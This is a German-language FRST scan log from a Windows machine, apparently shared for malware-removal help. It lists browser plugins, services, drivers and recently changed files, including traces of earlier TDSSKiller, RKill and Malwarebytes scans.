Hosts: Es ist mehr als ein Eintrag in der Hosts Datei zu finden. Siehe Hosts-Bereich in Addition.txt
Tcpip\..\Interfaces\{F8953A7D-9C43-4646-839A-B1AB93FEB40A}: [DhcpNameServer] 192.168.8.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
BHO: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> C:\Program Files\AMD\SteadyVideo\SteadyVideo.dll [2012-02-14] (Advanced Micro Devices)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_65\bin\ssv.dll [2015-10-28] (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_65\bin\jp2ssv.dll [2015-10-28] (Oracle Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> C:\Program Files (x86)\amd\SteadyVideo\SteadyVideo.dll [2012-02-14] (Advanced Micro Devices)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\ssv.dll [2015-10-28] (Oracle Corporation)
BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\jp2ssv.dll [2015-10-28] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
Filter: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter-x32: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter-x32: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF DefaultProfile: 2al5sams.default-1499987813602
FF ProfilePath: C:\Users\xxxxxx\AppData\Roaming\Mozilla\Firefox\Profiles\2al5sams.default-1499987813602 [2017-10-03]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_27_0_0_130.dll [2017-09-13] ()
FF Plugin: @java.com/DTPlugin,version=11.65.2 -> C:\Windows\system32\npdeployJava1.dll [2015-10-28] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre1.8.0_65\bin\plugin2\npjp2.dll [2015-10-28] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.65.2 -> C:\Program Files\Java\jre1.8.0_65\bin\plugin2\npjp2.dll [2015-10-28] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_27_0_0_130.dll [2017-09-13] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1224194.dll [2016-02-19] (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\dtplugin\npDeployJava1.dll [2015-10-28] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.65.2 -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\plugin2\npjp2.dll [2015-10-28] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll [2010-04-26] (Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-08-01] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1772142865-3804567698-3626976838-1001: @citrixonline.com/appdetectorplugin -> C:\Users\xxxxxx\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2016-02-24] (Citrix Online)
FF Plugin HKU\S-1-5-21-1772142865-3804567698-3626976838-1001: @talk.google.com/GoogleTalkPlugin -> C:\Users\xxxxxx\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll [2015-12-08] (Google)
FF Plugin HKU\S-1-5-21-1772142865-3804567698-3626976838-1001: @talk.google.com/O1DPlugin -> C:\Users\xxxxxx\AppData\Roaming\Mozilla\plugins\npo1d.dll [2015-12-08] (Google)
FF Plugin HKU\S-1-5-21-1772142865-3804567698-3626976838-1001: @tools.google.com/Google Update;version=3 -> C:\Users\xxxxxx\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin HKU\S-1-5-21-1772142865-3804567698-3626976838-1001: @tools.google.com/Google Update;version=9 -> C:\Users\xxxxxx\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin HKU\S-1-5-21-1772142865-3804567698-3626976838-1001: @zoom.us/ZoomVideoPlugin -> C:\Users\xxxxxx\AppData\Roaming\Zoom\bin\npzoomplugin.dll [2017-06-28] (Zoom Video Communications, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\xxxxxx\AppData\Roaming\mozilla\plugins\npgoogletalk.dll [2015-12-08] (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\xxxxxx\AppData\Roaming\mozilla\plugins\npo1d.dll [2015-12-08] (Google)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default [2017-10-03]
CHR Extension: (Google Slides) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-05-17]
CHR Extension: (Google Docs) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-05-17]
CHR Extension: (Google Drive) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-14]
CHR Extension: (YouTube) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-10]
CHR Extension: (Google Search) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-14]
CHR Extension: (Google Sheets) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-05-17]
CHR Extension: (Google Docs Offline) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-16]
CHR Extension: (Vue.js devtools) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\nhdogjmejiglipccpnnnanhbledajbpd [2017-07-19]
CHR Extension: (Chrome Web Store Payments) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-08-22]
CHR Extension: (Gmail) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-05-17]
CHR Extension: (Chrome Media Router) - C:\Users\xxxxxx\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-09-27]

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

ACHTUNG: => Signaturenvergleich konnte nicht durchgeführt werden. Kryptografischer Dienst läuft nicht.
S3 bigsql.bam2; C:\projects\PostgreSQL\bam2\bin\bam.exe [103936 2016-10-26] (Apache Software Foundation)
S3 BstHdAndroidSvc; C:\Program Files (x86)\Bluestacks\HD-Service.exe [387128 2017-05-24] (BlueStack Systems, Inc.)
S2 BstHdLogRotatorSvc; C:\Program Files (x86)\Bluestacks\HD-LogRotatorService.exe [369720 2017-05-24] (BlueStack Systems, Inc.)
S3 BstHdPlusAndroidSvc; C:\Program Files (x86)\Bluestacks\HD-Plus-Service.exe [406584 2017-05-24] (BlueStack Systems, Inc.)
S4 chip1click; C:\Program Files (x86)\Chip Digital GmbH\chip1click\chip 1-click installer.exe [91136 2016-10-27] (Chip Digital GmbH)
S3 Disc Soft Lite Bus Service; C:\projects\DAEMON Tools Lite\DiscSoftBusService.exe [1268568 2015-06-18] (Disc Soft Ltd)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [119864 2016-11-14] (Microsoft Corporation)
S3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [361816 2016-11-14] (Microsoft Corporation)
S4 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [88064 2014-03-28] (Softex Inc.)
S4 OracleJobSchedulerXE; c:\projects\oraclexe\app\oracle\product\11.2.0\server\Bin\extjob.exe [45568 2014-05-29] () S4 OracleMTSRecoveryService; C:\projects\oraclexe\app\oracle\product\11.2.0\server\BIN\omtsreco.exe [81408 2014-05-29] (Oracle Corporation) S3 OracleServiceXE; c:\projects\oraclexe\app\oracle\product\11.2.0\server\bin\ORACLE.EXE [147110912 2014-05-30] (Oracle Corporation) S3 OracleXEClrAgent; C:\projects\oraclexe\app\oracle\product\11.2.0\server\bin\OraClrAgnt.exe [83968 2014-05-29] (Oracle Corporation) S3 OracleXETNSListener; C:\projects\oraclexe\app\oracle\product\11.2.0\server\BIN\tnslsnr.exe [522240 2014-05-29] (Oracle Corporation) S3 PostgreSQL 9.6 Server; C:\projects\PostgreSQL\pg96\pgservice.exe [103936 2016-10-26] (Apache Software Foundation) S2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-09] (Realtek Semiconductor) S2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [237736 2015-07-06] (Synaptics Incorporated) S2 TeamViewer; C:\projects\TeamViewer\TeamViewer_Service.exe [10803440 2017-08-29] (TeamViewer GmbH) S2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [41472 2014-01-01] (Validity Sensors, Inc.) S3 VSStandardCollectorService140; C:\Program Files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [108776 2016-09-06] (Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2014-04-24] (Microsoft Corporation) ===================== Treiber (Nicht auf der Ausnahmeliste) ====================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) S3 amdkmcsp; C:\Windows\System32\DRIVERS\amdkmcsp.sys [95080 2017-06-12] (Advanced Micro Devices, Inc. ) R0 amdkmpfd; C:\Windows\System32\drivers\amdkmpfd.sys [36608 2013-12-14] (Advanced Micro Devices, Inc.) 
R1 amdpsp; C:\Windows\System32\DRIVERS\amdpsp.sys [239976 2017-06-12] (Advanced Micro Devices, Inc. )
S3 BstHdDrv; C:\Program Files (x86)\Bluestacks\HD-Hypervisor-amd64.sys [152672 2017-05-24] (BlueStack Systems)
S3 BstkDrv; C:\Program Files (x86)\Bluestacks\BstkDrv.sys [270904 2017-05-22] (Bluestack System Inc. )
S1 CLVirtualDrive; C:\Windows\System32\DRIVERS\CLVirtualDrive.sys [91912 2013-11-12] (CyberLink)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2015-07-15] (Disc Soft Ltd)
S3 L6PODHDBEAN; C:\Windows\System32\Drivers\L6PODHDBEAN64.sys [772864 2015-04-07] (Line 6)
S0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [295000 2016-08-25] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [135928 2016-08-25] (Microsoft Corporation)
S3 RtkAvrcp; C:\Windows\System32\DRIVERS\RtkAvrcp.sys [61152 2012-12-28] (Realtek Semiconductor Corporation)
S3 RtkBtFilter; C:\Windows\System32\DRIVERS\RtkBtfilter.sys [559320 2014-01-14] (Realtek Semiconductor Corporation)
S3 RTSPER; C:\Windows\System32\DRIVERS\RtsPer.sys [466648 2014-02-21] (Realsil Semiconductor Corporation)
S3 RTWlanE; C:\Windows\System32\DRIVERS\rtwlane.sys [6432256 2016-12-29] (Realtek Semiconductor Corporation )
S3 SmbDrv; C:\Windows\system32\drivers\Smb_driver_AMDASF.sys [29936 2014-02-26] (Synaptics Incorporated)
S3 SmbDrvI; C:\Windows\system32\drivers\Smb_driver_Intel.sys [31472 2014-02-26] (Synaptics Incorporated)
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
U5 UnlockerDriver5; C:\projects\Unlocker\UnlockerDriver5.sys [12352 2010-07-01] ()

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-10-03 22:14 - 2017-10-03 22:15 - 000262494 _____ C:\Windows\ntbtlog.txt
2017-10-02 18:00 - 2017-10-02 18:00 - 000398519 _____ C:\Users\xxxxxx\Desktop\Ioannis-Donnerstag-1800-L 10B Aufgaben.pdf
2017-10-01 21:54 - 2017-10-01 22:12 - 000227350 _____ C:\TDSSKiller.3.1.0.15_01.10.2017_21.54.37_log.txt
2017-10-01 21:52 - 2017-10-01 21:53 - 004922400 _____ (AO Kaspersky Lab) C:\Users\xxxxxx\Desktop\tdsskiller.exe
2017-10-01 21:17 - 2017-10-01 21:23 - 000003232 _____ C:\Users\xxxxxx\Desktop\Rkill.txt
2017-10-01 21:16 - 2017-10-01 21:16 - 001792640 _____ (Bleeping Computer, LLC) C:\Users\xxxxxx\Desktop\rkill.com
2017-10-01 19:49 - 2017-10-01 19:49 - 000000000 ____D C:\ProgramData\MB2Migration
2017-10-01 19:47 - 2017-10-01 19:47 - 001532424 _____ (CHIP Digital GmbH) C:\Users\xxxxxx\Downloads\Malwarebytes Malware Scanner - CHIP-Installer.exe
2017-09-29 17:59 - 2017-09-29 17:59 - 000000000 ____D C:\Users\xxxxxx\Documents\Zoom
2017-09-29 12:32 - 2017-09-29 12:32 - 000251036 _____ C:\Users\xxxxxx\Downloads\PHPMailer-master.zip
2017-09-29 12:32 - 2017-09-29 12:32 - 000000000 ____D C:\Users\xxxxxx\Downloads\PHPMailer-master-php5
2017-09-28 23:02 - 2017-09-28 23:11 - 000000000 ____D C:\Users\xxxxxx\Downloads\phpmailer-test
2017-09-27 14:12 - 2017-09-27 14:14 - 000000000 ____D C:\Users\xxxxxx\AppData\Local\Mxyzixi
2017-09-27 13:45 - 2017-09-27 13:45 - 000000000 ____D C:\Users\xxxxxx\AppData\Local\Jwixfip
2017-09-27 11:56 - 2017-09-27 11:56 - 000072888 _____ C:\Users\xxxxxx\Downloads\2017-09-13_Rechnung_Kundennr_109504505.pdf
2017-09-26 09:59 - 2017-09-26 10:31 - 000000000 ____D C:\Users\xxxxxx\Desktop\Git-tutorial-all
2017-09-25 14:25 - 2017-09-29 10:45 - 000000000 ____D C:\Users\xxxxxx\Desktop\Natty-whole-app-latest
2017-09-24 10:26 - 2017-09-24 10:26 - 000245200 _____ C:\Users\xxxxxx\Downloads\Lisa-SQL-klausur-1.zip
2017-09-23 12:27 - 2017-09-23 12:27 - 000004125 _____ C:\Users\xxxxxx\Downloads\ClientFormLogin.java
2017-09-22 12:18 - 2017-10-03 22:10 - 000000000 ____D C:\ProgramData\Bitmeter2
2017-09-22 12:18 - 2017-09-23 01:44 - 000000000 ____D C:\Users\xxxxxx\AppData\Roaming\Bitmeter2
2017-09-22 12:18 - 2017-09-22 12:18 - 001433942 _____ C:\Users\xxxxxx\Downloads\BitMeterInstaller.exe
2017-09-22 12:18 - 2017-09-22 12:18 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BitMeter
2017-09-22 12:18 - 2017-09-22 12:18 - 000000000 ____D C:\Program Files (x86)\Codebox
2017-09-22 12:15 - 2017-09-22 19:21 - 000000000 ____D C:\Program Files (x86)\NetMeter
2017-09-22 12:06 - 2017-09-23 01:44 - 000000000 ____D C:\Users\xxxxxx\AppData\Roaming\NetMeter
2017-09-21 19:04 - 2017-09-21 19:04 - 000002928 _____ C:\Users\xxxxxx\Downloads\script.php
2017-09-19 23:13 - 2017-09-19 23:13 - 000000000 ____D C:\Program Files\NetSpeedMonitor
2017-09-14 09:58 - 2017-09-14 09:58 - 002270423 _____ C:\Users\xxxxxx\Downloads\M-PESA_API_Guide_download.zip
2017-09-06 09:47 - 2017-09-06 09:47 - 000073935 _____ C:\Users\xxxxxx\Downloads\FBQW2D(1).pdf
2017-09-06 09:42 - 2017-09-06 09:42 - 000073789 _____ C:\Users\xxxxxx\Downloads\FBQW2D.pdf
2017-09-05 13:51 - 2017-09-05 13:51 - 000241354 _____ C:\Users\xxxxxx\Downloads\d3.zip
2017-09-05 08:43 - 2017-09-05 08:43 - 000003346 _____ C:\Users\xxxxxx\Downloads\composer.json
2017-09-04 14:37 - 2017-09-04 14:38 - 025405251 _____ C:\Users\xxxxxx\Downloads\typo3_src-7.6.21.zip
2017-09-04 14:19 - 2017-09-04 14:19 - 007671107 _____ C:\Users\xxxxxx\Downloads\extension_builder_7.6.18.t3x
2017-09-04 13:55 - 2017-09-04 13:55 - 010130247 _____ C:\Users\xxxxxx\Downloads\extension_builder_7.6.18.zip

==================== Ein
Monat: Geänderte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2017-10-03 22:16 - 2015-06-22 10:47 - 000000000 ____D C:\FRST 2017-10-03 22:13 - 2014-12-24 09:55 - 000065536 _____ C:\Windows\system32\spu_storage.bin 2017-10-03 22:13 - 2014-12-24 09:50 - 000000000 ____D C:\ProgramData\Validity 2017-10-03 22:13 - 2009-07-14 07:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2017-10-03 22:10 - 2009-07-14 06:45 - 000034208 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2017-10-03 22:10 - 2009-07-14 06:45 - 000034208 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2017-10-03 22:09 - 2016-11-18 11:39 - 000000000 ____D C:\Users\xxxxxx\AppData\LocalLow\Mozilla 2017-10-03 22:08 - 2015-05-16 10:04 - 000000000 ____D C:\Users\xxxxxx\Documents\Youcam 2017-10-03 22:06 - 2009-07-14 07:08 - 000032632 _____ C:\Windows\Tasks\SCHEDLGU.TXT 2017-10-03 22:02 - 2015-05-16 10:04 - 000003942 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{DE89F5BE-B625-4BF6-8A72-C7870ECC6155} 2017-10-03 16:13 - 2014-04-24 14:50 - 000703340 _____ C:\Windows\system32\perfh007.dat 2017-10-03 16:13 - 2014-04-24 14:50 - 000150952 _____ C:\Windows\system32\perfc007.dat 2017-10-03 16:13 - 2009-07-14 07:13 - 001625524 _____ C:\Windows\system32\PerfStringBackup.INI 2017-10-03 16:13 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\inf 2017-10-03 16:11 - 2016-02-24 23:53 - 000000546 _____ C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-1772142865-3804567698-3626976838-1001.job 2017-10-03 16:06 - 2016-02-24 23:53 - 000000642 _____ C:\Windows\Tasks\G2MUploadTask-S-1-5-21-1772142865-3804567698-3626976838-1001.job 2017-10-01 22:15 - 2015-05-16 11:25 - 000000000 ____D C:\ProgramData\Malwarebytes 2017-10-01 20:02 - 2015-09-01 15:06 - 000000340 _____ C:\Windows\Tasks\HPCeeScheduleForxxxxxx.job 2017-10-01 20:02 - 2015-05-16 11:23 - 000000000 
____D C:\projects 2017-10-01 20:01 - 2015-05-16 10:01 - 000000000 ____D C:\Users\xxxxxx 2017-10-01 19:31 - 2015-07-22 13:09 - 000000000 ____D C:\Users\xxxxxx\AppData\Local\ElevatedDiagnostics 2017-10-01 17:19 - 2015-09-01 15:06 - 000003198 _____ C:\Windows\System32\Tasks\HPCeeScheduleForxxxxxx 2017-10-01 10:20 - 2017-07-09 14:50 - 000000000 ____D C:\Users\xxxxxx\AppData\Local\GoToMeeting 2017-10-01 10:20 - 2016-02-24 23:53 - 000003674 _____ C:\Windows\System32\Tasks\G2MUploadTask-S-1-5-21-1772142865-3804567698-3626976838-1001 2017-10-01 10:20 - 2016-02-24 23:53 - 000003578 _____ C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-1772142865-3804567698-3626976838-1001 2017-09-29 18:13 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\system32\NDF 2017-09-29 10:52 - 2017-08-06 01:49 - 000000000 ____D C:\Users\xxxxxx\Desktop\laravel-vue-backend 2017-09-27 12:17 - 2016-09-28 17:03 - 000000000 ____D C:\Users\xxxxxx\.p2 2017-09-27 12:16 - 2015-05-16 12:21 - 000000000 ____D C:\Users\xxxxxx\AppData\Local\Eclipse 2017-09-26 21:09 - 2015-05-17 22:30 - 000002187 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2017-09-26 10:34 - 2016-05-23 18:07 - 000000000 ____D C:\Users\xxxxxx\Desktop\artue-loiesung-sql 2017-09-25 14:53 - 2016-11-01 12:40 - 000002248 ____H C:\Users\xxxxxx\Documents\Default.rdp 2017-09-25 14:42 - 2015-05-16 11:04 - 000000000 ____D C:\Users\xxxxxx\AppData\Roaming\Skype 2017-09-22 15:18 - 2015-09-23 10:44 - 000000000 ____D C:\Users\xxxxxx\AppData\Roaming\VisualParadigm 2017-09-22 15:09 - 2016-03-30 01:25 - 000000000 ___RD C:\Program Files (x86)\Skype 2017-09-22 15:09 - 2014-04-24 08:02 - 000000000 ____D C:\ProgramData\Skype 2017-09-22 11:19 - 2015-08-20 16:51 - 000000000 ____D C:\Users\xxxxxx\AppData\Roaming\NetSpeedMonitor 2017-09-21 15:02 - 2017-07-25 00:22 - 000000000 ____D C:\Users\xxxxxx\AppData\Roaming\npm-cache 2017-09-20 20:19 - 2017-05-31 19:56 - 000001024 _____ C:\Users\xxxxxx\.rnd 2017-09-20 11:36 - 2017-01-07 10:41 - 
000000695 _____ C:\Users\xxxxxx\Desktop\myBusiness-TODO.txt 2017-09-20 09:54 - 2017-02-28 19:59 - 000000773 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 12.lnk 2017-09-19 11:52 - 2009-07-14 04:34 - 000000612 _____ C:\Windows\win.ini 2017-09-19 09:09 - 2015-05-16 12:52 - 000000000 ____D C:\Users\xxxxxx\AppData\Local\CrashDumps 2017-09-17 10:09 - 2017-08-28 09:34 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio Code 2017-09-17 10:09 - 2017-08-28 09:32 - 000000000 ____D C:\Program Files\Microsoft VS Code 2017-09-17 10:09 - 2016-05-26 18:54 - 000000000 ____D C:\Users\xxxxxx\AppData\Roaming\Code 2017-09-15 20:02 - 2009-07-14 05:20 - 000000000 ____D C:\Windows\rescache 2017-09-15 08:49 - 2015-05-16 10:04 - 000000000 ___RD C:\Users\xxxxxx\Virtual Machines 2017-09-15 08:48 - 2009-07-14 06:45 - 000441208 _____ C:\Windows\system32\FNTCACHE.DAT 2017-09-14 23:07 - 2014-04-24 07:54 - 001603548 _____ C:\Windows\SysWOW64\PerfStringBackup.INI 2017-09-14 14:04 - 2015-05-16 12:06 - 000000000 ____D C:\Users\xxxxxx\AppData\Roaming\FileZilla 2017-09-13 10:59 - 2015-06-16 23:29 - 000004366 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater 2017-09-13 10:59 - 2014-04-24 07:58 - 000803328 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2017-09-13 10:59 - 2014-04-24 07:58 - 000144896 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2017-09-13 10:59 - 2014-04-24 07:58 - 000000000 ____D C:\Windows\SysWOW64\Macromed 2017-09-13 10:59 - 2014-04-24 07:58 - 000000000 ____D C:\Windows\system32\Macromed 2017-09-08 11:07 - 2016-05-26 20:42 - 000000000 _____ C:\Users\xxxxxx\.node_repl_history 2017-09-07 12:37 - 2017-08-17 01:54 - 000000000 ____D C:\Users\xxxxxx\Desktop\vue-laravel-frontend ==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ======= 2015-10-18 10:42 - 2015-10-18 10:43 - 000000411 _____ () 
C:\Users\xxxxxx\AppData\Roaming\javascriptobfuscator.jsop 2015-05-16 10:02 - 2016-02-12 10:57 - 003309262 _____ () C:\Users\xxxxxx\AppData\Local\BTServer.log 2017-08-05 11:51 - 2017-08-05 11:51 - 000000600 _____ () C:\Users\xxxxxx\AppData\Local\PUTTY.RND 2016-10-09 16:21 - 2016-10-09 16:21 - 000007606 _____ () C:\Users\xxxxxx\AppData\Local\Resmon.ResmonCfg Dateien, die verschoben oder gelöscht werden sollten: ==================== C:\Users\xxxxxx\.mongorc.js C:\Users\xxxxxx\ntuserdirect_MyManager.dat Einige Dateien in TEMP: ==================== 2015-07-17 04:04 - 2015-07-29 01:41 - 000000000 ____D () C:\Users\xxxxxx\AppData\Local\Temp\DllMonoCtrl.dll 2015-06-25 07:53 - 2015-06-25 07:53 - 000026936 _____ (TuneUp Software) C:\Users\xxxxxx\AppData\Local\Temp\DseShExt-x64.dll 2015-06-25 07:53 - 2015-06-25 07:53 - 000028984 _____ (TuneUp Software) C:\Users\xxxxxx\AppData\Local\Temp\DseShExt-x86.dll 2015-07-15 11:19 - 2015-07-15 11:23 - 019062208 _____ (Disc Soft Ltd) C:\Users\xxxxxx\AppData\Local\Temp\DTLite1010-0074.exe 2017-04-22 10:05 - 2017-04-22 10:05 - 000035680 _____ () C:\Users\xxxxxx\AppData\Local\Temp\i4jdel0.exe 2015-07-21 11:28 - 2015-07-21 11:28 - 000563808 _____ (Oracle Corporation) 